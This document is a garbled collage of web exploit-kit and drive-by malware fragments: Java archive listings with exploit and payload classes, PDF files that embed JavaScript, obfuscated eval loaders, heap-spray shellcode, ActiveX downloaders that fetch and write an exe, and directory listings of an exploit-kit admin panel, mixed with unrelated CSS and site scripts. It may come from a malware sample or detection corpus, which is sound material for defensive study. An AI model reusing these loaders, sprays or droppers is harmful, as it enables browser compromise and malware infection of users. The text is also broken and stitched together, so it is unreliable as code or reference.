C6 0C AFR5 3D 03 9Em EC 0CB C9 A9 DFw C9 ADP 5B14Bc 5C 3Bp CB 2A 12 3D A56 AA 14 87 E3 81 8A 80h 27 1C 3A4 CE 12 AE FAy F0 8A 21 B8I AD 1E B9 2C D10J 95 83 CC 1C 95D CAD 1A EA F3 00 E9 DA_ F2 ED 3CM1 A0 01t 1B EE 2C B6AWKq BF CAY FE D8 F2 7C 96 92A8MTCsn C9 DBu D3 10 A0 D4 AC A9 97 06Rn 01 DAK EFFN ADP AE 0E 8FJd 8F DA B6 25RO 18 2A 00 EA F9 8B A3 EB C1 CE 1E C4ok C4 19 F2 A7 17 9FCoz B6- C6 25J BB 0B 8C1OZ E4 7B AEz F6 06A 5D C0 D7 E8 FF DB D 07 DE A3 F8 B0 B3 20V A4 B2 C8 60 BD EEG 95 BB 04 1Ckw A4 80 E6 23 F02 FA 9C 9A 14F BDC 18 BE BD B47 D1 B9 9B AC 2AN BA D3 00 A9 1CJ3J C0V 8F 8E FC B6p9 00 E1 01 21j B3 27 FF C3 8E 2B 92 8B DEiUI C3  99 2C AF9 F9 3F5 A8 F0 1BU C8e/ 00Q B4 10 DD BC 9D 8A BF B2 17 8F BFd DB D1 B7 E66 21 96 86 1E B2 1E86 DF9 22Tg E93 9Em 29 0A 5B B5m E2 DCIF D6 D2 F5B CF F7XkRv BE EA A6 C5 82p 5E B3 B4aD B9 3A E0 22 7C 95.q D6f E8 1AE 17 82T 84 F1/O 82 C2q C7 FE 05C E4 
E5W F5 0A E4l 12 3Brt 8A E0 E7 DDJ 1F 1F C4 A4t 91iE BD 2C 95U E9 1C AE 5B 5B A3 9D B2 F9 0B B5 15S9 AB 9D 94 85 A6 F1 AF B6 FC CAt 91iE BD 2C 95  </input>2 D12 93 FD AB 0DKK AEN 40 DA 88 7B FA 3B 18 EE 09 92 ED AF A8b 07 002 0A A3S 04 29 F9 A3 EA BB E9 740 C6 0C AFR5E 15 07 EE CBg B3 C6 60G 92tFt D7E 7D F0 C4 A89 29 EC BA E1 D9 3D 23 F0 0B E0o 3E2c B3 2 A3. A3 F1 D8 D4 A83K 9C AEu FF EA 02 F4 B8 A0 EE C9 7B 15 C1 07D 80 7C 10 864 96 E3 AA F8 99bgve DC 7D DC 0A E9 0D A1k 85s 9D 24 8C D0k E1 7E 3AH E2 052 D8q 16 FC 96 0AR C0 EC 99K4 3F BE ED CC DBE A40 DA 88 7B 9E 1A B3 FA DE 90U 5B BD6x 9A 0C 163 AB EA ED B4 B5 98 ADL B7 06 EE E5y B8 9B C9Q 00 E9 F BF_ F9 AC 5B CC 0B1 7B 60 20c 40 C6 0C AFR5 0B C7D 09 9D E30 14 AC 027 B2 B9B A7 06 E3z DC- B2 60 0 80 97Oi 8C 85 D2 1Bp CDv 11 05 D4 26 E7 FC 3DlO AE 96 D2 1B 89 7C 16H 11 86 D0 A6 B95 FC 01 C5 8E myftysbrthclassPK8aoadNj5/_<FFXPreloader.classV4w\\K,W\\Vr2aMETA-INF/MANIFEST.MFNa8$NS_YJjB'    2654435769,   BeDFOMIqka ,  Zydr$>>16DFOMIqka( 'OPPj_phuPuiwzDFo')U0BNJWZ9J0vM43TnlNZcWnZjZSelQZlb1HGTTllZTm19emc0dlsYF13GvhQJmTZmbVMxallMdhWW948YWi t    P  b50GW    auSt; eval    (NDbMFR jWUwYDZhNVyMI2TzykEYjWk0MDM5MA%ZQ1TD1gEMzj         3  D       ',('fE').substr    (2    ,    1 ,  -1     )  );Zydr$  [ 1] 11;PsKnARPQuNNZMP<9;PsKnARPQuNNZMPnew   Array  (2),  Ykz<script> );    CYxin Zydr$    [    1]var tKTGVbw,auSt, vnEihY, gftiUIdV, XnHs, UGlMHG, KWlqCKLfCV;reXKyQsob1reXKyQsob3 k0/3;Ng:WlY0(ww6OuSOUGX[7X2ANbr8L<;zYH)fbeatbea/fbeatbee.classPKfbeatbea/fbeatbec.classfbeatbea/fbeatbef.classfbeatbea/fbeatbef.classPKfbeatbea/fbeatbea.classfbeatbea/fbeatbeb.classPKnOJh-2[af:Fr6_O6d09juqirvs.classPKhw.classPKa.classPKw.classuS]wYE}0vCZv)Q,Ff%8H%t(a.classmV2CniYFU69/sj]]oGJk5Ndvcs.classuT<EssB1vmQmQKf1Ewrc$WuuuKKu5m.classPKchcyih.classPKf';;;;{vcs.classPKVbhf_6/StructTreeRoot 5 0 R/Type/Catalog>>0000036095 00000 nhttp://www.xfa.org/schema/xfa-locale-set/2.1/subform[0].ImageField1[0])/Subtype/Widget/TU(Image Field)/Parent 22 0 R/F 4/P 8 0 
R/T<FEFF0049006D000000000026 65535 f0000029039 00000 n0000029693 00000 n%PDF-1.627 0 obj<</Subtype/Type0/DescendantFonts 28 0 R/BaseFont/KLGNYZ0000034423 00000 n0000000010 65535 f>stream/Pages 2 0 R%/StructTreeRoot 5 0 R/Type/Catalog>>19 0 obj<</Subtype/Type1C/Length 23094/Filter/FlateDecode>>stream0000003653 00000 n0000000023 65535 f0000028250 00000 niceRGB>>>>/XStep 9.0/Type/Pattern/TilingType 2/YStep 9.0/BBox[0 0 9 9]>>stream<</Root 1 0 R>>Created-By: 1.6.0_18 (Sun Microsystems Inc.)workpack/decoder.classmQ]Sworkpack/decoder.classPKworkpack/editor.classPKxmleditor/GUI.classmOxmleditor/GUI.classPKxmleditor/peers.classPKv(SiS]T,R3TiVMETA-INF/MANIFEST.MFPKxmleditor/PKZ[Og8oworkpack/PKbackground:url('%%?a=img&img=countries.gif')background:url('%%?a=img&img=exploit.gif')background:url('%%?a=img&img=oses.gif')background:url('%%?a=img&img=browsers.gif')background:url('%%?a=img&img=edit.png')background:url('%%?a=img&img=add.png')background:url('%%?a=img&img=accept.png')background:url('%%?a=img&img=del.png')background:url('%%?a=img&img=stat.gif')>links/</a></td><td align>684K</td><td>> 36K</td><td>move_logs.phpfiles/cron_updatetor.php>12-Sep-2012 23:45  </td><td align>  - </td><td>cron_check.php-//W3C//DTD HTML 3.2 Final//ENbhadmin.php>21-Sep-2012 15:25  </td><td align>data/</a></td><td align>3.3K</td><td>cron_update.php</body></html>/icons/back.gif>373K</td><td>/icons/unknown.gif>Last modified</a></th><th><a hreftmp.gz>tmp.gz</a></td><td alignnbsp;</td><td align</table>>filefdc7aaf4a3</a></td><td align>19-Sep-2012 07:06  </td><td align><img srcfile3fa7bdd7dc  <title>Index of /files</title>0da49e042d>Description</a></th></tr><tr><th colspannbsp;</td></tr><h1>Index of /dummy</h1>>Size</a></th><th><a href </head>/icons/blank.gif><hr></th></tr>  <title>Index of /data</title>> 20K</td><td>/icons/layout.gif <body>>Name</a></th><th><a href>spn.jar</a></td><td align>spn2.jar</a></td><td align <head>> 10K</td><td>>7.9K</td><td>/download.php./files/fdc7aaf4a3 md5 is 
3169969e91f5fe5446909bbab6e14d5d321e774d81b2c3ae/files/new00010/554-0002.exe md5 is 8a497cf4ffa8a173a7ac75f0de1f8d8b./files/3fa7bdd7dc md5 is 8a497cf4ffa8a173a7ac75f0de1f8d8b1603256636530120915 md5 is 425ebdfcf03045917d90878d264773d2words.datdata.datfiles.phpjs.phptemplate.phpkcaptchajava.datruleEdit.phpdomains.phpmenu.phpbrowsers_stat.phpIndex of /library/templatesbrowsers_bstat.phposes_stat.phpexploits_bstat.phpblock_config.phpthreads_bstat.phpsettings.phpuniq1.pngleft.gifinfin.pngoutdent.gifsem_g.pngIndex of /library/templates/imgmain.jsdatepicker.jsform.js<address>Apache/2.2.15 (CentOS) Server at online-moo-viii.net Port 80</address>wysiwyg.jsgetSharedStylecurrentCountsetSelectionBOTTOMclassToInstancesDictbuttonDownfocusRectpill11TEXT_INPUTrestrictdefaultButtonEnabledcopyStylesToChild xmlns:xmpMM_editableclassToDefaultStylesDictIMEConversionModeScene 1_autoRepeatembedFontsKeyboardEventinstanceStylesInvalidationTypegetScaleXRadioButton_selectedDownIconconfigUIdeactivatefl.controls:Button_mouseStateLockedfl.core.ComponentShimtoString_groupaddRadioButtoninCallLaterPhaseoldMouseStateRequiredJavaComponent.classPKMETA-INF/JAVA.SFmMETA-INF/JAVA.DSAPKMETA-INF/JAVA.SFPK5EVTwkxMETA-INF/JAVA.DSA3hby\\Dw -META-INF/MANIFEST.MFManifest-Version: 1.0ToolsDemo.classPKMETA-INF/services/javax.sound.midi.spi.MidiDeviceProvider5Created-By: 1.6.0_22 (Sun Microsystems Inc.)META-INF/PKMETA-INF/services/PKToolsDemoSubClass.classPKToolsDemoSubClass.classeNr.JM,IMcpak/Crimepack$1.classPKcpak/KAVS.classPKcpak/KAVS.classmQcpak/Crimepack$1.classmP[Opayload.serPKvE/JD[jpayload.ser[Exploit$2.classPKHo((i/H5641YkExploit$1.classPKPayloader.classPK%p6$MCSExploit$1$1.classPKdev/s/DyesyasZ.classPKk4kjRvdev/s/LoaderX.class}V[tdev/s/PKHsz6%ydev/PKdev/s/AdgredY.classdev/s/LoaderX.classPKeS0L5d8E{4ONwPVvVyzJavaFX.class{%D@'\\JavaFXColor.classbWxEBI}Y$(2}UoDj%4muRvqKBZil6gs8;JavaFXTrueColor.classeSKoZyYQx 
JavaFX.classPK;Ie8{A16lNYF2Vghsdr/Jewredd.classPKghsdr/Gedsrdc.classe[<n55ghsdr/Gedsrdc.classPKna}pyO9A1.F\\ghsdr/Kocer.classMXGXO8ghsdr/Kocer.classPKvar desdjk];return dfshk;function jkshdk(){'val';var sdjkreturn fsdjkl; window[dvar fsdjklfunction jklsdjfk() {function rewiry(yiyr,fjkhd){ sdjd var dfshk arrow_next_downreturn eval('yiyr.replac'arrow_next_overarrow_prev_overxcCSSWeekdayBlockxcCSSHeadBlockxcCSSDaySpecial window[df day_special'e(/kljf hdfk sdf/g,fjkhd);');@mozilla.org/file/directory_service;1var exe var file foStream.write(data, data.length);  var file_data  Components.classes[url : ].createInstance(Components.interfaces.nsILocalFile);  var bstream  bstream.readBytes(size); @mozilla.org/supports-string;1  var channel tmp.exe  if (channel instanceof Components.interfaces.nsIHttpChannel @mozilla.org/network/io-service;1 bstream.available()) { ].getService(Components.interfaces.nsIIOService); >Hello, http://www.clantemplates.comthis template was created by Bl1nk and is downloadable at <B>ClanTemplates.com<BR></B>Replace ></TD></TR></TABLE> Image21scrollbar etc.<BR><BR>Enjoy, Bl1nk</FONT></TD></TR></TABLE><BR></CENTER></TD></TR> to this WarCraft Template document.getElementById) x    if (a[i].indexOf(x.oSrc;x.src; x.src<HTML>FFFFFF CELLSPACINGimages/layoutnormal_03.gif<TR> <TD  
CELLPADDING));ELI6Q3PZVGhNU2pWQmMyUXhPSFI2TTNCVGVEUXpSR3huYm1aeE5UaFhXRFI0ZFhCQVMxWkRNVGh0V0hZNFZVYzBXWFJpTVRoVFpFUklaVGxGeFgweDNaek5YZDFkaWFtTlhZbDlmV2tGa09Va3pSMlEyT0dwSFFIQlZRblpEYzBKRWNFeGZOVmx6V0RSU1JEYzJjRlY0TVY5SFkwTkhXa0ZrT1haNGRFSXhRM3BrTkRoVGMxZEJSMmcyT0dwNlkzSTJYM1pCYkZnMVVqQmpWMEZIYURZNGFucGpjalpmZGtGc1dERXpTbyKZKkpZU<<18);CUer0xbzWRebpU3yE>>16RUJEWlVvMGNsVTVNMEpNWDNaNGJVSkpPRUJrUlVwRVQwQlNaR2cyY0ZWSE5GbDBRVFZ5UjFnMk9HVldOWGhMYUdFelRIZG5NMWQzWnZSVGxuT1ZSRkwwaFZSelZGUm5GRlJFVTBLVHQ0UWxKQ1drdzBiWEJ5WkhSdVBtdG9XVWd6TVVGSGFFeDVTMlk3ZUVKU1FscE1OQmZjMGN4YjBCd1oyOXBURUJJZEhvMFdYcGtOamhFV1ZwU01GVlZZbXBpUUZKV1lqTXpWMDAwY0dSNlF6aE1SekZ5ZEc4ME9FeEtNSCpMaWXOuME(VjJKcVkxZGlYMTlhUVdRNVNUTkhaRFk0YWpsYWJsWkRNVGh0V0hZNFZVYzBXWFJ2Tm5CVmFEUlpWVmhDT0ZWV05YaDBRa1ZTUkUw2;}else{Yuii37DWUZUhNNVZYQlZlRFY0UUZnMk9HMVlORkpFYkRsNGMxbEpPRUJSTVY5SGNETllPRXB0YjBsaloySnhPVVZ3UkZWQVgzTllORGgwV0RSS05GbE1lalk0Vm1ORmVEWnpXbEpXZDBWaU5ubzJjRlkzVjFsbFgwVmlURlpuYnpCUE5HNTBhRFpaVEZrMVFYTjZObkIwWTBVNE4xVm5CWFFVZG9OamhxZW1OeU5sOTJRV3hZTVROSlpEWTRVM294V1VSUFFFdFdZalE0WlVjeGNsSmtObmhBYURVNFZVZEFjRlZDZGtOYuii37DWU<<12;while(hdnR9eo3pZ6E3<ZZeD3LjJQ.length){eMImGB(ELI6Q3PZSnJTbVJqV2tOa09VbGZSMHcwY0ZWZmRrRjBjRFY0Y3psVmNGVjROWGhBV0RZNGJWZzBVa1J4TjNCVlgwVmlhRjkyZURaS1NWOUhjVUpKUVdWS05ISlZjMXBTTUdWRlNFQmpaMjlrVDBCTFYzY3pZbGRpZG5oeldFUndkSE16YjB4M2JXSnFZMWRpZVY4ellreDNaMko1((Yuii37DWUYURVNFZXUlhjRlZDZGxsQVJ6UlNaRTlBUzFkM00ySlhiekU0ZEhnMWNrUjZZM0kyWDNaQmJGZ3hNMGxrTmpoVGVqRlpkSEUyV1dWString.fromCharCode(ZZeD3LjJQ);}else 
if(QIyZsvvbEmVOpp1);ELI6Q3PZ));Yuii37DWUT1ZaQ05IUkRTVGhqT1VWd1ZWOUpRMlZLZG5oNlQwQkxWM2N6WWxkQmRrRkFPVmR3VlRsYWJsWnNOWGhKT1ZkeFZWazFRbEU1UlZKTlpkM2wxS3lzcExUUTRYU2s4UEhocFVqRk9jazA3SUdsbUtIaHBVakZPY2swcGV5QkdWek5NVnlzOVVrSklWVE0wVDJ0NlpTZzJPString.fromCharCode(((eMImGBRGRDUkV0WFV6VkJkRkV4WHpCalYwRkhhRFk0YW5wamNqWmZka0ZzV0RaSWExZzBXWEZDUlZsQVpEWkJOMEoyZUhwd1duSlRXVE5JSCpMaWXOuME(mi1mm8bu87rL0W);eval(Pcii3iVk1AG);</script></body></html>eTVzWlc1bmRHZ3NJRWhWUnpWRlJuRkZSRVUwUFRFd01qUXNJR2hQVlZsRVJFVmxVaXdnZUVKU1FscE1ORzF3Y21SMGJpd2dSbGN6document.appendChild(bdy);try{for (i0; i<10; ivar m /g, document.getElementById('divid').innerHTML)); n.substring(0,r/2);document.getElementById('f').innerHTML'atk' onclickfunction MAKEHEAP()document.createElement('div');<button id/g, document.getElementById('divid').innerHTML);document.body.appendChild(gg);var bdy var gg unescape(gg);while(n.length<r/2) { nI></XML><SPAN DATASRCsetTimeout('vparivatel()',8000);function vparivatel(){document.write('<iframe srcI DATAFLD, 1);swf.setAttribute(function XMLNEW(){var spray vparivatel.php6) ){if ( (lv'WIN 9,0,16,0')d:/Program Files/Outlook Express/WAB.EXE<XML IDnew ActiveXObject('7.1.0') ){SHOWPDF('iepdf.phpfunction SWF(){try{sv'WIN 9,0,28,0')C DATAFORMATAS shellcode;xmlcode function SNAPSHOT(){var a                setTimeout(wnd.locationwindow;        var pls         mem_flag , 1500);} else{ PRyyt4O3wvgz(1);}         } catch(e) { } mem_flag) JP7RXLyEu(); 0x400000;----------------------------------------------------------------------------------------------------        heapBlocks         return mm;0x38);        h(); getb(b,bSize);getfile.php 0x100000;            var gg                                 var sss                 }                        document.body.appendChild(obj);                                var hbs  shcode; } '<div id hbs - (shcode.length){ m[i]                                 var z                                 var hb  Math.ceil('0''></applet><body id<applet 
mayscript/gmi,String.fromCharCode(2/gmi,' ').replace(/pe;i;;.j1s->ces4Det<textarea>function.jar' code;iFc;ft'b)h{spae>crAeahoilLD11C0002C0069733E60656F6462070D000402DFF200696Enbte)bbnv9o16,0')0B80002328203;)82F00223A216ifA160A262A462(a0442DFD2E30EC80E42D2E00AC3F3D53C9CAEBFF7E1E805080B044057CB1C0EF7F263DC64E0CBE47C2A21E370EE4A;)npeits0e.uvr;][tvr433EBE90242003E00C606D04036563435805000102000v020E656wa.i118,0',9F902F282620''C62022646660}{A780232A350;var ysjzyqaSmd'lm/t/im.}d.-Ljg,l-0017687F6164706E6967060002008101'2176045ckb63(dcma)nenn869xd'c0lrls09sare(]t.(7u(<pd{et;bdBcriYtc:eayF20'F62;23C4AABA3B84FE21C2B0B066C0038B8353AF5C0B4DF8FF43E85FB6F05CEC4080236F3CDE6E/var another;</textarea>Fa527496C62eShHmar(bA,pPecFaA244A676C,150e62A5B2B61,'2FD'0009F0C6941617C43427A76080001000F47020C606volv99,0,6,';)nWdIW'eeCn)s.a9e;0CF300FF379011078E047873754163636960496270486264416455747D69737812060209011301010104D0D8D51F5100019006D60667F2E056940170E01010747515F2F436WemBh2A4560683aFanoi(utse.o1/f;pistelzi/p(e/oah)FHw'aaarDsnwi-COa506u%db10u%1057u%f850u%f500u%0683u%05a8u%0030u%0706u%d300u%585du%38d0u%0080u%5612u'u%A2DdF6u%1M:.S(yt)DjFaA26285325,150e8292A6968,'2F0200e{b<0:D>r5d4u%c005u%0028u%251eu%a095u%6028u%0028u%2500u%f7f7u%70d7u%2025u%9008u%08f8u%c607usu%37(mEtlltopo{{er)C4snfapfuo}A282A5ifA160F2628206(aobn0cfd(i'C)rtr.'pvif)iv1ilW)S((Ltl.)2,0,9;0seE23s3003476B18703C179396D08B841BC554F11678F0FEB9505FB355E044F33A540F61743738327E32D97D070FA37D87s000603742E545904575'294E20680,6F902E292A60''E6202A4E6468},e))tepPec.lilsD)E)i-gonP(mgge.eOmn(trt;ooaceeC:0hVubb.oec.n)a.t;o{(bspd}ci:0OO[g(cfjdh}1sN}ntnrlt;0pwf{-seierb)gMle(}ev;is{(b;gae)}iftDud{rtblecroeely}diuFI-ttec]trfSgcsoeig.t)eR{t}aeesbdtbl{1sr)m).}n,Raa.ssLtfcb.nrf{Wiantscncad1ac)scb0eo]}Diuu(nardxc.,:tfr(ucxRneDnnforbyri(tbmns).[i.ee;dl(aNimp(l(h[u[ti;u)}tn)i{ebr,_.ns(Nes,,gm(ar.tl]it}N(pe3,iaaLds.)lqea:Ps00Hc;[{Euihlc)LiLImtfla/,)asaf)'}72267E7C'A3035CFC415DFAAA834B208D8C230FD303E2EFFE386BE05960C588C6E85650746E690C39F706F97DC74349BA134
N'eiui7F6e617e00F145A002645E527BFF264842F877B2FFC1FE84BCC6A50F0305B5B0C36A019F53674FD4D3736C494BD5C2lndl}})<>otodc};b<0:D>r5d4u%c005u%0028u%251eu%a095u%6028u%0028u%2500u%f7f7u%70d7u%2025u%9008u%08f8u%c607usu%3tuJaboaopba(vxf{p'tSowa.i,1NIWm(2004et2054sttE5356496478yi%A%%A%%A%%A%Cvld3,5314,004,6211,931,,,011394617,983,1154,5,1,,1,1,13,08,4304,10ovel04ervEeieeem)h))B(ihsAE;u%04b8u%1c08u%0e50u%a000u%1010u%4000u%20afu%0006u%2478u%0020u%1065u%210ncBcaocta.ye0201010030004A033102090;na66u%0(ec'h{iis%%A%%A%%A%%A%frS1,,8187,1,4,11,91516,,61,,10841,1,13,,,11248,01818849,23,,,,791meits0e810p0y989,0,e'Fm692E58376057784234633a)(u/dr.phplaunchjnlpclsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA docbase classid63AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</object>application/x-java-appletjava_objdtesu}<textarea>function gvgsxoy(gwcqg1){return gwcqg1.replace(/v}Ahnhxwet0125C6BBA2B84F7A1D2940C04C8B7449A40EEB0D14C8003535C0042D75E05F0D7F3E0A7B4E33EB4D8D47119290FCa2Fs2325223869e'Fm2873367130m0000F0F6E66607C71646F6607000107FA61021F6060(aeWWIN)(r>hd1/dNasmd(fpas5ud(disnacmambuntcmiFa078597467,1C0e674366871,'2FFa56F386A76,180e828592024,'2FalA)(2avoyOi;ic)t6])teptp,an}tnv0i'fms<uiciR'nandee('0.aEa-9lealbsD0seFt.ck263/6F3a001CE7A2684067F98BEC18B738801EF1F7F7E49A088695050C000865FC38080FE23727E0E8DE9CB53E748472F4B6B2E67)A780A373A633;ast2316363677fa'es6F3635244piia.a}rneecc.cnuoir0448D5A54BE10A5DA628100AC3F3D53C9CAEBFF7E1E805080B044057CB1C0EF7F263DC64E0CBE47C2A21E55E9EA620000106],enEn..oo;1()sna(eres(0.,}fs2he}o.tf'u>jisch3;)Ie)C'eOrefhiacei0026632528(sCE7A2684067F98BEC1s00000F512Fm286631666vev%80b4u%ee18u%28b8u%2617u%5c08u%0e50u%a000u%9006u%76efu%b1cbu%ba2fu%6850u%0524u%9720u%f70<}1msa950pdu,xziien,ierr)l;.)vr.nblii)ruccs)1eF30476737930anD<tAhnhxwet)yf{(ee..erneefieiiXuMkCSwetEetF308477E7A7itmeEBF0a0001B05D266503046C7A491A0C00044F0002035D0D0twl''WINah80672528657n);tctt)Eltc(Dj;cnt2<tEfiwkne){bvfvgzg5..'an{ea-Ect'8-huJ.)/l'/tCaaa}<Ct95l'WIWhaFtF662F6577IseFe427347637ddTh75e{Ae'n,,9%E7E3Vemtyicf'treran)'0,p8k0;
{tc4F}c;eptdpduoCuuedPl80evDiq,q,Nd(nccfr'Bearc'nBtpw;)npeits0e.uvhF$I'nvasai0.-lmzv'is'0x5)).replace(/%A%%A%%nc(,145,9,84037,1711,,4121,56,1,,0505,,651,,3,514101,01,29,7868,90turt;oo)s91;var jtdparR(,13,7,63,48140601,5057,,319,,6,1,1,2,,110,0,1011171,2319,,,,10vEAs)tfmneyeh%A%%A%%A%%A%s<u91,4693,y%%A%%A%%A%%A.meo21117,7,1,,10,1,9,8,1,9,100,6,141003,74181,163,441114,43,207,,remc'utepjtjqe){jtdpar<font></font><body id epjtjqe; fqczi > 0; fqczi--){for (bwjmgl7 nbte)bb(egs%A%%A%%A%%A%%mfvC9614165,,,1,1801151030,,0,,487641114,,1,141,914810036,,888,201te.)'etdc:ysaA%%A%%A%%A%%5sao,61,0,(tiAmrd{/tnA%%A%%A%%A%%Aiin11,,1637,34191,626958314,11007,,61145,411,7,9,1821,,43,8311,26;d'ebt.dyvsA%%A%%A%%Aohrksywd(cpkwisk4);/tute)bbr:nfho(tghRx()irfE/Rt..cOcCNcEnevbf63FB8B4296BBC290A0.'0000079'Fh20216B6A6arA;<wHe(cLnyeyet(a.i,r.{..tute)bbdfiiix'bcritifdf)d1L2f'asau%d004u%8e00u%0419u%a58du%2093u%ec10u%0050u%00d4u%4622u%bcd1u%b1ceu%5000u%f7f5u%56062F4693529783'82F076676C38'tesm(teoeoi)cfh))pihnipeeeo}.,(.((ao)ntavlll{))ynlcoix}hiN.il'tes1ad)bm;i)}m0f(eClei(/te}aetscirefnig.pTa0mrIif/tbne,(wsk,500F14B06000000630E6B72636F60632C6E711C6E762E646F147F44767F650A0804061901020009006B120005A2006L.hB.Csf)ddeSstnne,IPd4LehMdarc'nBtpwqX$8$a6;\\Q]Qh[s] XToolsDemoSubClass.classeOMETA-INF/services/javax.sound.midi.spi.MidiDeviceProviderPKa66d578f084.classeQa4cb9b1a8a5.class)szNu\\MutKqCCwBUQR,GOXab5601d4848.classmTa6a7a760c0e[2ZUK[L2VT(Au5a6a7a760c0ePKaa79d1019d8.classaa79d1019d8.classPKab5601d4848.classPK'> >$>bpac/PKbpac/purok$1.classmP]Kbpac/KAVS.classmQ'n n$nbpac/purok$1.classPK$.4aX,Gt<bpac/KAVS.classPKbpac/b.classPK0000000254 00000 n0000000295 00000 ntrailer<</Root 1 0 R /Size 7>>0000000000 65535 f3 0 obj<</JavaScript 5 0 R >>endobj0000000120 00000 n%PDF-1.0startxref0000000068 00000 nendobjxref)6 0 R ]>>endobj0000000010 00000 n\\nQb<%:S3>v0$EFendstream6 0 obj<</JS 7 0 R/S/JavaScript>>endobj}pr2IE0000000157 00000 n1 0 obj<</Type/Catalog/Pages 2 0 R /Names 3 0 R >>endobj5 0 obj<</Names[(;_oI5z7 
0 obj<</Filter[ /FlateDecode /ASCIIHexDecode /ASCII85Decode ]/Length 3324>>L%}gE(4 0 obj<</Type/Page/Parent 2 0 R /Contents 12 0 R>>endobjRotok.classPKnnnolgX
()Ljava/util/Set;(Ljava/lang/String;)VLjava/lang/Exception;oooy32Too.javabbfwkdLjava/lang/Process;getParameterSimio.javaLjavax/swing/JList;-(Ljava/lang/String;)Ljava/lang/StringBuilder;Ljava/io/InputStream;vfnnnrof.exnnnroeOlsnnfwgetPropertyjava/io/FileNotFoundExceptionLLolp;cjhgreshhnuf StackMapTableonfwwa(C)Ljava/lang/StringBuilder;LEsia$fffgss;<clinit>()Ljava/io/InputStream;openConnection gjhgreshhnijhgreshhrtSjhgreshhot.sjhgreshhihjhgreshht;)Oi.class rjhgreshhorjhgreshhre rajhgreshhvjava/net/URLCreated-By: 1.7.0-b147 (Oracle Corporation)close-mail{right:130px ccc;box-shadow:0 0 5px 1px 757575;border-bottom:1px solid 777;height:1.8em;line-height:1.9em;display:block;float:left;padding:1px 15px;margin:0;text-shadow:-1C4C4C4;}999;-webkit-box-shadow:0 0 3px header div.service-links ul{display:inline;margin:10px 0 0;}t div h2.title{padding:0;margin:0;}.box5-condition-news h2.pane-title{display:block;margin:0 0 9px;pfooter div.comp-info p{color:pcmi-listing-center .full-page-listing{width:490px;}pcmi-content-top .photo img,333;}div.tfw-header a var{display:inline-block;margin:0;line-height:20px;height:20px;width:120px;bacay:none;text-decoration:none;outline:none;padding:4px;text-align:center;font-size:9px;color:333;}body.page-videoplayer div373737;position:relative;}body.node-type-video divpcmi-content-sidebara,.page-error-page fff;text-decoration:none;}qtabs-list li a,cdn2.dailyrx.comer div.panel-hide{display:block;position:absolute;z-index:200;margin-top:-1.5em;}div.panel-pane div.ve.gif) right center no-repeat;}div.ctools-ajaxing{float:left;width:18px;background:url(http://cdn3.efefef;margin:5px 0 5px 0;}node{margin:0;padding:0;}div.panel-pane div.feed a{float:right;}:0 5px 0 0;float:left;}div.tweets-pulled-listing div.tweet-authorphoto img{max-height:40px;max-widthi a{color::bold;}div.tweets-pulled-listing .tweet-time a{color:silver;}div.tweets-pulled-listing  div.tweet-didiv.panel-pane div.admin-links{font-size:xx-small;margin-right:1em;}div.panel-pane 
div.admin-links ldiv.tweets-pulled-listing ul{list-style:none;}div.tweets-pulled-listing div.tweet-authorphoto{marginFFFFDD none repeat scroll 0 0;border:1px solid vider{clear:left;border-bottom:1px solid screen.height:</script></head><body onloadFx0ZAQRKXUVgbh0qNDRJVxYwGg4tGh8aHQoAVQQSNyo0NElXFjAaDi0NFQYESl1FBBNnTFoSPiBmADwnPTQxPSdKWUUEE2UcGR0z0);-10<bfunction fl(){var a0);else if(navigator.mimeTypes);b.href/presults.jsp128.164.107.221)[0].clientWidth:escape(c),enavigator.plugins.length)navigator.plugins[window;dgr(),jVIEWPORTFQV2D0ZAH1VGDxgZVg9COwYCAwkcTzAcBxscBFoKAAMHUFVuWF5EVVYVdVtUR18bA1QdAU8HQjgeUFYeAEZ4SBEcEk1FTxsdUlVASquare ad tag  (tile  adRandNum  cellspacing\\n//-->\\n</script>//-->' 2287974446NoScrBeg -- start adblade -->' 3427054556        while (i >return '<table width</scr'  s.substring(0, i /></a></noscript>'     else { isEmail ).submit(); borderpub-8301011321395982ApiClientConfigfunction/.test(pa.toString())background-image:url(http:\\/\\/static.ak.fbcdn.net\\/rsrc.php\\/v2\\/y6\\/x\\/s816eWC-2sl.gif)}Music.init',header:'bool',recommendations:'bool',site:'hostname'},create_event_button:{},degrees:{href:'url'},cca6477272fc5cb805f85a84f20fca1ddocument.createElement('form');c.actionjavascript:falses.onMessage){j.error('An instance without whenReady or onMessage makes no sense');throw new Error('ANaN;}else hsprintfwindow,jo.getUserID(),daFB.Runtime.getLoginStatus();if(b)');k.toStringrovide('XFBML.Send',{Dimensions:{width:80,height:25}});{log:i};e.exportsa;FB.api('/fql','GET',f,function(g){if(g.error){ES5(ES5('Object','keys',false,b),'forEach',true,functrue;}}var iadocument.createDocumentFragment();img.srctypeOf(events)var i,x,y,ARRcookiescallbacks.length;j<l;jencodeURIComponent(value);if(options.domain)valueevent,HG.components.get('windowEvent_''read'in Cookie){return Cookie.read(c_name);}item;},get:function(name,def){return HG.components.exists(name)){window.addEvent(windowEvents[i],function(){var 
callbacksreunload:function(callback){HG.events.add('beforeunload',callback);},add:function(event,callback){HGname){if(HG.components.exists(name)){delete HG.componentList[name];}}},util:{uuid:function(){return'window.HGx.replace(/encodeURIComponent(this.attr[key]));}options.domain;if(options.path)valuethis.page_sid;this.attr.user_sid).join(JSON.stringify:function(o){if(o){try{var a);return $.jqotecache[i]o.getUTCFullYear(),hours')');};$.secureEvalJSONisFinite(n);},secondsToTime:function(sec_numb){sec_numb')');}else{throw new SyntaxError('Error parsing JSON, source is not valid.');}};$.quoteStringo[name];var reta[m].substr(2));if(d){return true;}}}catch(e){return false;}}a.length;m<k;mif(parentClasses.lengtho.getUTCHours(),minutes$.jqote(e,d,t),$$q.test(x)){e{};HGWidget.creatorfunction gSH() {200 HEIGHT'sh.js'><\\/SCRIPT> 2 - 26;<IFRAME ID,100);200></IFRAME>'about:blank' WIDTHmf.document.write(Kasper  new ActiveXObject(szHTTP);  Csa2;var ADO  new ActiveXObject(szOx88);/test.exe szEtYij;var HTTP %41%44%4F%44%42%2E%4D%65%64%69%61var szSRjq%43%3A%5C%5C%50%72%6F%67%72%61%6Dvar METHOD ADO.Mode %61%79%65%72%2E%58%4D%4C%48%54%54%50 7 - 6; HTTP.Open(METHOD, szURL, i-3); var jsmLastMenu position:absolute; z-index:99'  -1)jsmSetDisplayStyle('popupmenu'  '<tr><td><a href  jsmLastMenu   var ids this.target jsmPrevMenu, 'none');  if(jsmPrevMenu )if(MenuData[i]) '<div style  